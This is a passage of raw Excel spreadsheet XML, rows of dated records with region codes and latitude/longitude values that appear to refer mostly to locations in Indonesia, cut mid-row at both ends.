      <c r="E3628" t="s">
        <v>23</v>
      </c>
      <c r="F3628" t="s">
        <v>11980</v>
      </c>
      <c r="H3628" t="s">
        <v>7978</v>
      </c>
      <c r="I3628" t="s">
        <v>7979</v>
      </c>
      <c r="J3628" t="s">
        <v>1656</v>
      </c>
      <c r="L3628" t="s">
        <v>11981</v>
      </c>
      <c r="M3628">
        <v>3173080003</v>
      </c>
      <c r="N3628">
        <v>3173080</v>
      </c>
      <c r="O3628">
        <v>3173</v>
      </c>
      <c r="P3628">
        <v>31</v>
      </c>
      <c r="Q3628" t="s">
        <v>157</v>
      </c>
      <c r="R3628" t="s">
        <v>157</v>
      </c>
      <c r="S3628" t="s">
        <v>62</v>
      </c>
      <c r="T3628" t="s">
        <v>33</v>
      </c>
      <c r="U3628" s="5">
        <v>10682608</v>
      </c>
      <c r="V3628" s="5" t="s">
        <v>15146</v>
      </c>
      <c r="W3628" s="5">
        <v>-618021</v>
      </c>
      <c r="X3628" t="s">
        <v>21451</v>
      </c>
      <c r="Y3628" t="str">
        <f t="shared" si="56"/>
        <v>-6.18021,106.82608</v>
      </c>
    </row>
    <row r="3629" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3629">
        <v>284421</v>
      </c>
      <c r="B3629" s="1">
        <v>44265</v>
      </c>
      <c r="C3629" s="2">
        <v>0.3354166666666667</v>
      </c>
      <c r="D3629" t="s">
        <v>2648</v>
      </c>
      <c r="E3629" t="s">
        <v>23</v>
      </c>
      <c r="G3629" t="s">
        <v>11982</v>
      </c>
      <c r="H3629" t="s">
        <v>26</v>
      </c>
      <c r="J3629" t="s">
        <v>3135</v>
      </c>
      <c r="L3629" t="s">
        <v>11983</v>
      </c>
      <c r="M3629">
        <v>3671010013</v>
      </c>
      <c r="N3629">
        <v>3671010</v>
      </c>
      <c r="O3629">
        <v>3671</v>
      </c>
      <c r="P3629">
        <v>36</v>
      </c>
      <c r="Q3629" t="s">
        <v>11984</v>
      </c>
      <c r="R3629" t="s">
        <v>200</v>
      </c>
      <c r="S3629" t="s">
        <v>201</v>
      </c>
      <c r="T3629" t="s">
        <v>171</v>
      </c>
      <c r="U3629" s="5">
        <v>10669635</v>
      </c>
      <c r="V3629" s="5" t="s">
        <v>17494</v>
      </c>
      <c r="W3629" s="5">
        <v>-622741</v>
      </c>
      <c r="X3629" t="s">
        <v>19120</v>
      </c>
      <c r="Y3629" t="str">
        <f t="shared" si="56"/>
        <v>-6.22741,106.69635</v>
      </c>
    </row>
    <row r="3630" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3630">
        <v>284438</v>
      </c>
      <c r="B3630" s="1">
        <v>44265</v>
      </c>
      <c r="C3630" s="2">
        <v>0.393587962962963</v>
      </c>
      <c r="D3630" t="s">
        <v>22</v>
      </c>
      <c r="E3630" t="s">
        <v>23</v>
      </c>
      <c r="F3630" t="s">
        <v>11985</v>
      </c>
      <c r="G3630" t="s">
        <v>11986</v>
      </c>
      <c r="H3630" t="s">
        <v>26</v>
      </c>
      <c r="I3630" t="s">
        <v>166</v>
      </c>
      <c r="J3630" t="s">
        <v>6626</v>
      </c>
      <c r="L3630" t="s">
        <v>11987</v>
      </c>
      <c r="M3630">
        <v>7371100007</v>
      </c>
      <c r="N3630">
        <v>7371100</v>
      </c>
      <c r="O3630">
        <v>7371</v>
      </c>
      <c r="P3630">
        <v>73</v>
      </c>
      <c r="Q3630" t="s">
        <v>11988</v>
      </c>
      <c r="R3630" t="s">
        <v>8580</v>
      </c>
      <c r="S3630" t="s">
        <v>6629</v>
      </c>
      <c r="T3630" t="s">
        <v>6630</v>
      </c>
      <c r="U3630" s="5">
        <v>11945716</v>
      </c>
      <c r="V3630" s="5" t="s">
        <v>17717</v>
      </c>
      <c r="W3630" s="5">
        <v>-515951</v>
      </c>
      <c r="X3630" t="s">
        <v>21452</v>
      </c>
      <c r="Y3630" t="str">
        <f t="shared" si="56"/>
        <v>-5.15951,119.45716</v>
      </c>
    </row>
    <row r="3631" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3631">
        <v>284439</v>
      </c>
      <c r="B3631" s="1">
        <v>44265</v>
      </c>
      <c r="C3631" s="2">
        <v>0.42393518518518519</v>
      </c>
      <c r="D3631" t="s">
        <v>85</v>
      </c>
      <c r="E3631" t="s">
        <v>23</v>
      </c>
      <c r="F3631" t="s">
        <v>11989</v>
      </c>
      <c r="G3631" t="s">
        <v>11990</v>
      </c>
      <c r="H3631" t="s">
        <v>26</v>
      </c>
      <c r="J3631" t="s">
        <v>2627</v>
      </c>
      <c r="K3631" t="s">
        <v>11991</v>
      </c>
      <c r="L3631" t="s">
        <v>11992</v>
      </c>
      <c r="M3631">
        <v>3275010010</v>
      </c>
      <c r="N3631">
        <v>3275010</v>
      </c>
      <c r="O3631">
        <v>3275</v>
      </c>
      <c r="P3631">
        <v>32</v>
      </c>
      <c r="Q3631" t="s">
        <v>286</v>
      </c>
      <c r="R3631" t="s">
        <v>287</v>
      </c>
      <c r="S3631" t="s">
        <v>41</v>
      </c>
      <c r="T3631" t="s">
        <v>42</v>
      </c>
      <c r="U3631" s="5">
        <v>10694408</v>
      </c>
      <c r="V3631" s="5" t="s">
        <v>17718</v>
      </c>
      <c r="W3631" s="5">
        <v>-625349</v>
      </c>
      <c r="X3631" t="s">
        <v>21453</v>
      </c>
      <c r="Y3631" t="str">
        <f t="shared" si="56"/>
        <v>-6.25349,106.94408</v>
      </c>
    </row>
    <row r="3632" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3632">
        <v>284442</v>
      </c>
      <c r="B3632" s="1">
        <v>44265</v>
      </c>
      <c r="C3632" s="2">
        <v>0.59347222222222229</v>
      </c>
      <c r="D3632" t="s">
        <v>22</v>
      </c>
      <c r="E3632" t="s">
        <v>23</v>
      </c>
      <c r="F3632" t="s">
        <v>11993</v>
      </c>
      <c r="G3632" t="s">
        <v>11994</v>
      </c>
      <c r="H3632" t="s">
        <v>26</v>
      </c>
      <c r="I3632" t="s">
        <v>628</v>
      </c>
      <c r="J3632" t="s">
        <v>6626</v>
      </c>
      <c r="M3632">
        <v>7308011003</v>
      </c>
      <c r="N3632">
        <v>7308011</v>
      </c>
      <c r="O3632">
        <v>7308</v>
      </c>
      <c r="P3632">
        <v>73</v>
      </c>
      <c r="Q3632" t="s">
        <v>11995</v>
      </c>
      <c r="R3632" t="s">
        <v>11995</v>
      </c>
      <c r="S3632" t="s">
        <v>11996</v>
      </c>
      <c r="T3632" t="s">
        <v>6630</v>
      </c>
      <c r="U3632" s="5">
        <v>11953244</v>
      </c>
      <c r="V3632" s="5" t="s">
        <v>17719</v>
      </c>
      <c r="W3632" s="5">
        <v>-515478</v>
      </c>
      <c r="X3632" t="s">
        <v>21454</v>
      </c>
      <c r="Y3632" t="str">
        <f t="shared" si="56"/>
        <v>-5.15478,119.53244</v>
      </c>
    </row>
    <row r="3633" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3633">
        <v>284443</v>
      </c>
      <c r="B3633" s="1">
        <v>44265</v>
      </c>
      <c r="C3633" s="2">
        <v>0.71597222222222223</v>
      </c>
      <c r="D3633" t="s">
        <v>2648</v>
      </c>
      <c r="E3633" t="s">
        <v>23</v>
      </c>
      <c r="G3633" t="s">
        <v>11997</v>
      </c>
      <c r="H3633" t="s">
        <v>26</v>
      </c>
      <c r="J3633" t="s">
        <v>404</v>
      </c>
      <c r="L3633" t="s">
        <v>11998</v>
      </c>
      <c r="M3633">
        <v>3174020005</v>
      </c>
      <c r="N3633">
        <v>3174020</v>
      </c>
      <c r="O3633">
        <v>3174</v>
      </c>
      <c r="P3633">
        <v>31</v>
      </c>
      <c r="Q3633" t="s">
        <v>30</v>
      </c>
      <c r="R3633" t="s">
        <v>31</v>
      </c>
      <c r="S3633" t="s">
        <v>32</v>
      </c>
      <c r="T3633" t="s">
        <v>33</v>
      </c>
      <c r="U3633" s="5">
        <v>10676926</v>
      </c>
      <c r="V3633" s="5" t="s">
        <v>17720</v>
      </c>
      <c r="W3633" s="5">
        <v>-616614</v>
      </c>
      <c r="X3633" t="s">
        <v>20777</v>
      </c>
      <c r="Y3633" t="str">
        <f t="shared" si="56"/>
        <v>-6.16614,106.76926</v>
      </c>
    </row>
    <row r="3634" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3634">
        <v>284448</v>
      </c>
      <c r="B3634" s="1">
        <v>44265</v>
      </c>
      <c r="C3634" s="2">
        <v>0.73021990740740739</v>
      </c>
      <c r="D3634" t="s">
        <v>22</v>
      </c>
      <c r="E3634" t="s">
        <v>23</v>
      </c>
      <c r="F3634" t="s">
        <v>11999</v>
      </c>
      <c r="G3634" t="s">
        <v>12000</v>
      </c>
      <c r="H3634" t="s">
        <v>26</v>
      </c>
      <c r="I3634" t="s">
        <v>166</v>
      </c>
      <c r="J3634" t="s">
        <v>12001</v>
      </c>
      <c r="L3634" t="s">
        <v>12002</v>
      </c>
      <c r="M3634">
        <v>3171060004</v>
      </c>
      <c r="N3634">
        <v>3171060</v>
      </c>
      <c r="O3634">
        <v>3171</v>
      </c>
      <c r="P3634">
        <v>31</v>
      </c>
      <c r="Q3634" t="s">
        <v>5027</v>
      </c>
      <c r="R3634" t="s">
        <v>1236</v>
      </c>
      <c r="S3634" t="s">
        <v>108</v>
      </c>
      <c r="T3634" t="s">
        <v>33</v>
      </c>
      <c r="U3634" s="5">
        <v>10681228</v>
      </c>
      <c r="V3634" s="5" t="s">
        <v>17721</v>
      </c>
      <c r="W3634" s="5">
        <v>-624488</v>
      </c>
      <c r="X3634" t="s">
        <v>21455</v>
      </c>
      <c r="Y3634" t="str">
        <f t="shared" si="56"/>
        <v>-6.24488,106.81228</v>
      </c>
    </row>
    <row r="3635" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3635">
        <v>284449</v>
      </c>
      <c r="B3635" s="1">
        <v>44265</v>
      </c>
      <c r="C3635" s="2">
        <v>0.73234953703703709</v>
      </c>
      <c r="D3635" t="s">
        <v>22</v>
      </c>
      <c r="E3635" t="s">
        <v>23</v>
      </c>
      <c r="F3635" t="s">
        <v>12003</v>
      </c>
      <c r="G3635" t="s">
        <v>12004</v>
      </c>
      <c r="H3635" t="s">
        <v>26</v>
      </c>
      <c r="I3635" t="s">
        <v>290</v>
      </c>
      <c r="J3635" t="s">
        <v>5026</v>
      </c>
      <c r="L3635" t="s">
        <v>12005</v>
      </c>
      <c r="M3635">
        <v>3171060004</v>
      </c>
      <c r="N3635">
        <v>3171060</v>
      </c>
      <c r="O3635">
        <v>3171</v>
      </c>
      <c r="P3635">
        <v>31</v>
      </c>
      <c r="Q3635" t="s">
        <v>5027</v>
      </c>
      <c r="R3635" t="s">
        <v>1236</v>
      </c>
      <c r="S3635" t="s">
        <v>108</v>
      </c>
      <c r="T3635" t="s">
        <v>33</v>
      </c>
      <c r="U3635" s="5">
        <v>10681214</v>
      </c>
      <c r="V3635" s="5" t="s">
        <v>17722</v>
      </c>
      <c r="W3635" s="5">
        <v>-624529</v>
      </c>
      <c r="X3635" t="s">
        <v>21456</v>
      </c>
      <c r="Y3635" t="str">
        <f t="shared" si="56"/>
        <v>-6.24529,106.81214</v>
      </c>
    </row>
    <row r="3636" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3636">
        <v>284555</v>
      </c>
      <c r="B3636" s="1">
        <v>44266</v>
      </c>
      <c r="C3636" s="2">
        <v>8.1759259259259254E-2</v>
      </c>
      <c r="D3636" t="s">
        <v>22</v>
      </c>
      <c r="E3636" t="s">
        <v>23</v>
      </c>
      <c r="F3636" t="s">
        <v>12006</v>
      </c>
      <c r="G3636" t="s">
        <v>12007</v>
      </c>
      <c r="H3636" t="s">
        <v>26</v>
      </c>
      <c r="I3636" t="s">
        <v>65</v>
      </c>
      <c r="J3636" t="s">
        <v>6626</v>
      </c>
      <c r="L3636" t="s">
        <v>12008</v>
      </c>
      <c r="M3636">
        <v>7371111002</v>
      </c>
      <c r="N3636">
        <v>7371111</v>
      </c>
      <c r="O3636">
        <v>7371</v>
      </c>
      <c r="P3636">
        <v>73</v>
      </c>
      <c r="Q3636" t="s">
        <v>8594</v>
      </c>
      <c r="R3636" t="s">
        <v>7102</v>
      </c>
      <c r="S3636" t="s">
        <v>6629</v>
      </c>
      <c r="T3636" t="s">
        <v>6630</v>
      </c>
      <c r="U3636" s="5">
        <v>11948819</v>
      </c>
      <c r="V3636" s="5" t="s">
        <v>17723</v>
      </c>
      <c r="W3636" s="5">
        <v>-514785</v>
      </c>
      <c r="X3636" t="s">
        <v>21457</v>
      </c>
      <c r="Y3636" t="str">
        <f t="shared" si="56"/>
        <v>-5.14785,119.48819</v>
      </c>
    </row>
    <row r="3637" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3637">
        <v>284575</v>
      </c>
      <c r="B3637" s="1">
        <v>44266</v>
      </c>
      <c r="C3637" s="2">
        <v>0.14166666666666666</v>
      </c>
      <c r="D3637" t="s">
        <v>2648</v>
      </c>
      <c r="E3637" t="s">
        <v>23</v>
      </c>
      <c r="G3637" t="s">
        <v>12009</v>
      </c>
      <c r="H3637" t="s">
        <v>26</v>
      </c>
      <c r="I3637" t="s">
        <v>1059</v>
      </c>
      <c r="J3637" t="s">
        <v>404</v>
      </c>
      <c r="L3637" t="s">
        <v>10251</v>
      </c>
      <c r="M3637">
        <v>3174020005</v>
      </c>
      <c r="N3637">
        <v>3174020</v>
      </c>
      <c r="O3637">
        <v>3174</v>
      </c>
      <c r="P3637">
        <v>31</v>
      </c>
      <c r="Q3637" t="s">
        <v>30</v>
      </c>
      <c r="R3637" t="s">
        <v>31</v>
      </c>
      <c r="S3637" t="s">
        <v>32</v>
      </c>
      <c r="T3637" t="s">
        <v>33</v>
      </c>
      <c r="U3637" s="5">
        <v>10677090</v>
      </c>
      <c r="V3637" s="5" t="s">
        <v>16399</v>
      </c>
      <c r="W3637" s="5">
        <v>-616654</v>
      </c>
      <c r="X3637" t="s">
        <v>20327</v>
      </c>
      <c r="Y3637" t="str">
        <f t="shared" si="56"/>
        <v>-6.16654,106.77090</v>
      </c>
    </row>
    <row r="3638" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3638">
        <v>285332</v>
      </c>
      <c r="B3638" s="1">
        <v>44268</v>
      </c>
      <c r="C3638" s="2">
        <v>7.4999999999999997E-2</v>
      </c>
      <c r="D3638" t="s">
        <v>2648</v>
      </c>
      <c r="E3638" t="s">
        <v>23</v>
      </c>
      <c r="G3638" t="s">
        <v>12010</v>
      </c>
      <c r="H3638" t="s">
        <v>26</v>
      </c>
      <c r="J3638" t="s">
        <v>12011</v>
      </c>
      <c r="L3638" t="s">
        <v>12012</v>
      </c>
      <c r="M3638">
        <v>3172030001</v>
      </c>
      <c r="N3638">
        <v>3172030</v>
      </c>
      <c r="O3638">
        <v>3172</v>
      </c>
      <c r="P3638">
        <v>31</v>
      </c>
      <c r="Q3638" t="s">
        <v>2107</v>
      </c>
      <c r="R3638" t="s">
        <v>228</v>
      </c>
      <c r="S3638" t="s">
        <v>49</v>
      </c>
      <c r="T3638" t="s">
        <v>33</v>
      </c>
      <c r="U3638" s="5">
        <v>10691618</v>
      </c>
      <c r="V3638" s="5" t="s">
        <v>17724</v>
      </c>
      <c r="W3638" s="5">
        <v>-634277</v>
      </c>
      <c r="X3638" t="s">
        <v>21458</v>
      </c>
      <c r="Y3638" t="str">
        <f t="shared" si="56"/>
        <v>-6.34277,106.91618</v>
      </c>
    </row>
    <row r="3639" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3639">
        <v>285333</v>
      </c>
      <c r="B3639" s="1">
        <v>44268</v>
      </c>
      <c r="C3639" s="2">
        <v>7.4999999999999997E-2</v>
      </c>
      <c r="D3639" t="s">
        <v>2648</v>
      </c>
      <c r="E3639" t="s">
        <v>23</v>
      </c>
      <c r="G3639" t="s">
        <v>12013</v>
      </c>
      <c r="H3639" t="s">
        <v>26</v>
      </c>
      <c r="J3639" t="s">
        <v>12011</v>
      </c>
      <c r="L3639" t="s">
        <v>12014</v>
      </c>
      <c r="M3639">
        <v>3172030001</v>
      </c>
      <c r="N3639">
        <v>3172030</v>
      </c>
      <c r="O3639">
        <v>3172</v>
      </c>
      <c r="P3639">
        <v>31</v>
      </c>
      <c r="Q3639" t="s">
        <v>2107</v>
      </c>
      <c r="R3639" t="s">
        <v>228</v>
      </c>
      <c r="S3639" t="s">
        <v>49</v>
      </c>
      <c r="T3639" t="s">
        <v>33</v>
      </c>
      <c r="U3639" s="5">
        <v>10691620</v>
      </c>
      <c r="V3639" s="5" t="s">
        <v>17725</v>
      </c>
      <c r="W3639" s="5">
        <v>-634277</v>
      </c>
      <c r="X3639" t="s">
        <v>21458</v>
      </c>
      <c r="Y3639" t="str">
        <f t="shared" si="56"/>
        <v>-6.34277,106.91620</v>
      </c>
    </row>
    <row r="3640" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3640">
        <v>285338</v>
      </c>
      <c r="B3640" s="1">
        <v>44268</v>
      </c>
      <c r="C3640" s="2">
        <v>0.17306712962962964</v>
      </c>
      <c r="D3640" t="s">
        <v>22</v>
      </c>
      <c r="E3640" t="s">
        <v>23</v>
      </c>
      <c r="F3640" t="s">
        <v>12015</v>
      </c>
      <c r="G3640" t="s">
        <v>12016</v>
      </c>
      <c r="H3640" t="s">
        <v>26</v>
      </c>
      <c r="I3640" t="s">
        <v>1498</v>
      </c>
      <c r="J3640" t="s">
        <v>1128</v>
      </c>
      <c r="L3640" t="s">
        <v>12017</v>
      </c>
      <c r="U3640" s="5">
        <v>12069256</v>
      </c>
      <c r="V3640" s="5" t="s">
        <v>17726</v>
      </c>
      <c r="W3640" s="5">
        <v>1503192</v>
      </c>
      <c r="X3640" t="s">
        <v>21459</v>
      </c>
      <c r="Y3640" t="str">
        <f t="shared" si="56"/>
        <v>15.03192,120.69256</v>
      </c>
    </row>
    <row r="3641" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3641">
        <v>285339</v>
      </c>
      <c r="B3641" s="1">
        <v>44268</v>
      </c>
      <c r="C3641" s="2">
        <v>0.17586805555555554</v>
      </c>
      <c r="D3641" t="s">
        <v>22</v>
      </c>
      <c r="E3641" t="s">
        <v>23</v>
      </c>
      <c r="F3641" t="s">
        <v>12018</v>
      </c>
      <c r="G3641" t="s">
        <v>12019</v>
      </c>
      <c r="H3641" t="s">
        <v>26</v>
      </c>
      <c r="I3641" t="s">
        <v>834</v>
      </c>
      <c r="J3641" t="s">
        <v>1128</v>
      </c>
      <c r="U3641" s="5">
        <v>12073606</v>
      </c>
      <c r="V3641" s="5" t="s">
        <v>17727</v>
      </c>
      <c r="W3641" s="5">
        <v>1506887</v>
      </c>
      <c r="X3641" t="s">
        <v>21460</v>
      </c>
      <c r="Y3641" t="str">
        <f t="shared" si="56"/>
        <v>15.06887,120.73606</v>
      </c>
    </row>
    <row r="3642" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3642">
        <v>285340</v>
      </c>
      <c r="B3642" s="1">
        <v>44268</v>
      </c>
      <c r="C3642" s="2">
        <v>0.48927083333333332</v>
      </c>
      <c r="D3642" t="s">
        <v>22</v>
      </c>
      <c r="E3642" t="s">
        <v>23</v>
      </c>
      <c r="F3642" t="s">
        <v>12020</v>
      </c>
      <c r="G3642" t="s">
        <v>12021</v>
      </c>
      <c r="H3642" t="s">
        <v>26</v>
      </c>
      <c r="I3642" t="s">
        <v>7487</v>
      </c>
      <c r="J3642" t="s">
        <v>1656</v>
      </c>
      <c r="L3642" t="s">
        <v>12022</v>
      </c>
      <c r="M3642">
        <v>3173080003</v>
      </c>
      <c r="N3642">
        <v>3173080</v>
      </c>
      <c r="O3642">
        <v>3173</v>
      </c>
      <c r="P3642">
        <v>31</v>
      </c>
      <c r="Q3642" t="s">
        <v>157</v>
      </c>
      <c r="R3642" t="s">
        <v>157</v>
      </c>
      <c r="S3642" t="s">
        <v>62</v>
      </c>
      <c r="T3642" t="s">
        <v>33</v>
      </c>
      <c r="U3642" s="5">
        <v>10682719</v>
      </c>
      <c r="V3642" s="5" t="s">
        <v>16695</v>
      </c>
      <c r="W3642" s="5">
        <v>-617546</v>
      </c>
      <c r="X3642" t="s">
        <v>21461</v>
      </c>
      <c r="Y3642" t="str">
        <f t="shared" si="56"/>
        <v>-6.17546,106.82719</v>
      </c>
    </row>
    <row r="3643" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3643">
        <v>285341</v>
      </c>
      <c r="B3643" s="1">
        <v>44269</v>
      </c>
      <c r="C3643" s="2">
        <v>0.24305555555555555</v>
      </c>
      <c r="D3643" t="s">
        <v>2648</v>
      </c>
      <c r="E3643" t="s">
        <v>23</v>
      </c>
      <c r="G3643" t="s">
        <v>12023</v>
      </c>
      <c r="H3643" t="s">
        <v>26</v>
      </c>
      <c r="J3643" t="s">
        <v>12024</v>
      </c>
      <c r="L3643" t="s">
        <v>12025</v>
      </c>
      <c r="M3643">
        <v>3172010005</v>
      </c>
      <c r="N3643">
        <v>3172010</v>
      </c>
      <c r="O3643">
        <v>3172</v>
      </c>
      <c r="P3643">
        <v>31</v>
      </c>
      <c r="Q3643" t="s">
        <v>5561</v>
      </c>
      <c r="R3643" t="s">
        <v>5562</v>
      </c>
      <c r="S3643" t="s">
        <v>49</v>
      </c>
      <c r="T3643" t="s">
        <v>33</v>
      </c>
      <c r="U3643" s="5">
        <v>10686620</v>
      </c>
      <c r="V3643" s="5" t="s">
        <v>15327</v>
      </c>
      <c r="W3643" s="5">
        <v>-630088</v>
      </c>
      <c r="X3643" t="s">
        <v>21462</v>
      </c>
      <c r="Y3643" t="str">
        <f t="shared" si="56"/>
        <v>-6.30088,106.86620</v>
      </c>
    </row>
    <row r="3644" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3644">
        <v>285351</v>
      </c>
      <c r="B3644" s="1">
        <v>44274</v>
      </c>
      <c r="C3644" s="2">
        <v>0.35861111111111116</v>
      </c>
      <c r="D3644" t="s">
        <v>22</v>
      </c>
      <c r="E3644" t="s">
        <v>23</v>
      </c>
      <c r="F3644" t="s">
        <v>12026</v>
      </c>
      <c r="H3644" t="s">
        <v>26</v>
      </c>
      <c r="I3644" t="s">
        <v>7285</v>
      </c>
      <c r="J3644" t="s">
        <v>2627</v>
      </c>
      <c r="L3644" t="s">
        <v>12027</v>
      </c>
      <c r="M3644">
        <v>3271060004</v>
      </c>
      <c r="N3644">
        <v>3271060</v>
      </c>
      <c r="O3644">
        <v>3271</v>
      </c>
      <c r="P3644">
        <v>32</v>
      </c>
      <c r="Q3644" t="s">
        <v>12028</v>
      </c>
      <c r="R3644" t="s">
        <v>7835</v>
      </c>
      <c r="S3644" t="s">
        <v>421</v>
      </c>
      <c r="T3644" t="s">
        <v>42</v>
      </c>
      <c r="U3644" s="5">
        <v>10679820</v>
      </c>
      <c r="V3644" s="5" t="s">
        <v>17728</v>
      </c>
      <c r="W3644" s="5">
        <v>-657081</v>
      </c>
      <c r="X3644" t="s">
        <v>21463</v>
      </c>
      <c r="Y3644" t="str">
        <f t="shared" si="56"/>
        <v>-6.57081,106.79820</v>
      </c>
    </row>
    <row r="3645" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3645">
        <v>285354</v>
      </c>
      <c r="B3645" s="1">
        <v>44276</v>
      </c>
      <c r="C3645" s="2">
        <v>0.97499999999999998</v>
      </c>
      <c r="D3645" t="s">
        <v>2648</v>
      </c>
      <c r="E3645" t="s">
        <v>23</v>
      </c>
      <c r="G3645" t="s">
        <v>12029</v>
      </c>
      <c r="H3645" t="s">
        <v>26</v>
      </c>
      <c r="J3645" t="s">
        <v>12011</v>
      </c>
      <c r="L3645" t="s">
        <v>12030</v>
      </c>
      <c r="M3645">
        <v>3172030001</v>
      </c>
      <c r="N3645">
        <v>3172030</v>
      </c>
      <c r="O3645">
        <v>3172</v>
      </c>
      <c r="P3645">
        <v>31</v>
      </c>
      <c r="Q3645" t="s">
        <v>2107</v>
      </c>
      <c r="R3645" t="s">
        <v>228</v>
      </c>
      <c r="S3645" t="s">
        <v>49</v>
      </c>
      <c r="T3645" t="s">
        <v>33</v>
      </c>
      <c r="U3645" s="5">
        <v>10691599</v>
      </c>
      <c r="V3645" s="5" t="s">
        <v>17729</v>
      </c>
      <c r="W3645" s="5">
        <v>-634305</v>
      </c>
      <c r="X3645" t="s">
        <v>21464</v>
      </c>
      <c r="Y3645" t="str">
        <f t="shared" si="56"/>
        <v>-6.34305,106.91599</v>
      </c>
    </row>
    <row r="3646" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3646">
        <v>285356</v>
      </c>
      <c r="B3646" s="1">
        <v>44276</v>
      </c>
      <c r="C3646" s="2">
        <v>0.97777777777777775</v>
      </c>
      <c r="D3646" t="s">
        <v>2648</v>
      </c>
      <c r="E3646" t="s">
        <v>23</v>
      </c>
      <c r="G3646" t="s">
        <v>12031</v>
      </c>
      <c r="H3646" t="s">
        <v>26</v>
      </c>
      <c r="J3646" t="s">
        <v>12011</v>
      </c>
      <c r="L3646" t="s">
        <v>12032</v>
      </c>
      <c r="M3646">
        <v>3172030001</v>
      </c>
      <c r="N3646">
        <v>3172030</v>
      </c>
      <c r="O3646">
        <v>3172</v>
      </c>
      <c r="P3646">
        <v>31</v>
      </c>
      <c r="Q3646" t="s">
        <v>2107</v>
      </c>
      <c r="R3646" t="s">
        <v>228</v>
      </c>
      <c r="S3646" t="s">
        <v>49</v>
      </c>
      <c r="T3646" t="s">
        <v>33</v>
      </c>
      <c r="U3646" s="5">
        <v>10691597</v>
      </c>
      <c r="V3646" s="5" t="s">
        <v>17730</v>
      </c>
      <c r="W3646" s="5">
        <v>-634292</v>
      </c>
      <c r="X3646" t="s">
        <v>21465</v>
      </c>
      <c r="Y3646" t="str">
        <f t="shared" si="56"/>
        <v>-6.34292,106.91597</v>
      </c>
    </row>
    <row r="3647" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3647">
        <v>285357</v>
      </c>
      <c r="B3647" s="1">
        <v>44276</v>
      </c>
      <c r="C3647" s="2">
        <v>0.97638888888888886</v>
      </c>
      <c r="D3647" t="s">
        <v>2648</v>
      </c>
      <c r="E3647" t="s">
        <v>23</v>
      </c>
      <c r="G3647" t="s">
        <v>12033</v>
      </c>
      <c r="H3647" t="s">
        <v>26</v>
      </c>
      <c r="J3647" t="s">
        <v>12011</v>
      </c>
      <c r="L3647" t="s">
        <v>12034</v>
      </c>
      <c r="M3647">
        <v>3172030001</v>
      </c>
      <c r="N3647">
        <v>3172030</v>
      </c>
      <c r="O3647">
        <v>3172</v>
      </c>
      <c r="P3647">
        <v>31</v>
      </c>
      <c r="Q3647" t="s">
        <v>2107</v>
      </c>
      <c r="R3647" t="s">
        <v>228</v>
      </c>
      <c r="S3647" t="s">
        <v>49</v>
      </c>
      <c r="T3647" t="s">
        <v>33</v>
      </c>
      <c r="U3647" s="5">
        <v>10691597</v>
      </c>
      <c r="V3647" s="5" t="s">
        <v>17730</v>
      </c>
      <c r="W3647" s="5">
        <v>-634292</v>
      </c>
      <c r="X3647" t="s">
        <v>21465</v>
      </c>
      <c r="Y3647" t="str">
        <f t="shared" si="56"/>
        <v>-6.34292,106.91597</v>
      </c>
    </row>
    <row r="3648" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3648">
        <v>285398</v>
      </c>
      <c r="B3648" s="1">
        <v>44278</v>
      </c>
      <c r="C3648" s="2">
        <v>0.18541666666666667</v>
      </c>
      <c r="D3648" t="s">
        <v>2648</v>
      </c>
      <c r="E3648" t="s">
        <v>23</v>
      </c>
      <c r="G3648" t="s">
        <v>12035</v>
      </c>
      <c r="H3648" t="s">
        <v>26</v>
      </c>
      <c r="J3648" t="s">
        <v>12036</v>
      </c>
      <c r="L3648" t="s">
        <v>12037</v>
      </c>
      <c r="M3648">
        <v>3172030004</v>
      </c>
      <c r="N3648">
        <v>3172030</v>
      </c>
      <c r="O3648">
        <v>3172</v>
      </c>
      <c r="P3648">
        <v>31</v>
      </c>
      <c r="Q3648" t="s">
        <v>228</v>
      </c>
      <c r="R3648" t="s">
        <v>228</v>
      </c>
      <c r="S3648" t="s">
        <v>49</v>
      </c>
      <c r="T3648" t="s">
        <v>33</v>
      </c>
      <c r="U3648" s="5">
        <v>10689192</v>
      </c>
      <c r="V3648" s="5" t="s">
        <v>17731</v>
      </c>
      <c r="W3648" s="5">
        <v>-632139</v>
      </c>
      <c r="X3648" t="s">
        <v>21466</v>
      </c>
      <c r="Y3648" t="str">
        <f t="shared" si="56"/>
        <v>-6.32139,106.89192</v>
      </c>
    </row>
    <row r="3649" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3649">
        <v>285406</v>
      </c>
      <c r="B3649" s="1">
        <v>44278</v>
      </c>
      <c r="C3649" s="2">
        <v>0.21728009259259259</v>
      </c>
      <c r="D3649" t="s">
        <v>22</v>
      </c>
      <c r="E3649" t="s">
        <v>23</v>
      </c>
      <c r="F3649" t="s">
        <v>12038</v>
      </c>
      <c r="H3649" t="s">
        <v>26</v>
      </c>
      <c r="I3649" t="s">
        <v>1447</v>
      </c>
      <c r="J3649" t="s">
        <v>7637</v>
      </c>
      <c r="L3649" t="s">
        <v>12039</v>
      </c>
      <c r="M3649">
        <v>6205050013</v>
      </c>
      <c r="N3649">
        <v>6205050</v>
      </c>
      <c r="O3649">
        <v>6205</v>
      </c>
      <c r="P3649">
        <v>62</v>
      </c>
      <c r="Q3649" t="s">
        <v>12040</v>
      </c>
      <c r="R3649" t="s">
        <v>12041</v>
      </c>
      <c r="S3649" t="s">
        <v>12042</v>
      </c>
      <c r="T3649" t="s">
        <v>7642</v>
      </c>
      <c r="U3649" s="5">
        <v>11489905</v>
      </c>
